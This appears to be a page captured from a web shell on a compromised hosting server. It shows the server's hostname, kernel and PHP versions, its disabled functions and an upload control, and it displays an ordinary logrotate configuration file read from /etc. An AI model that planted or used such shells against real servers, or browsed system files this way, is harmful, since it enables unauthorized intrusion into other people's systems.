HEX
Server: Apache
System: Linux atlantis.turkiyesunucu.com 3.10.0-1160.119.1.el7.tuxcare.els19.x86_64 #1 SMP Mon Mar 31 17:29:00 UTC 2025 x86_64
User: ()
PHP: 5.6.40
Disabled: exec,passthru,shell_exec,system
Upload Files
File: //etc/logrotate.d/nscd_logs
/var/log/nscd.log {
    rotate 15
    size=300M
    missingok
    compress
    postrotate
        /usr/local/cpanel/scripts/restartsrv_nscd >/dev/null 2>&1 || true
    endscript
}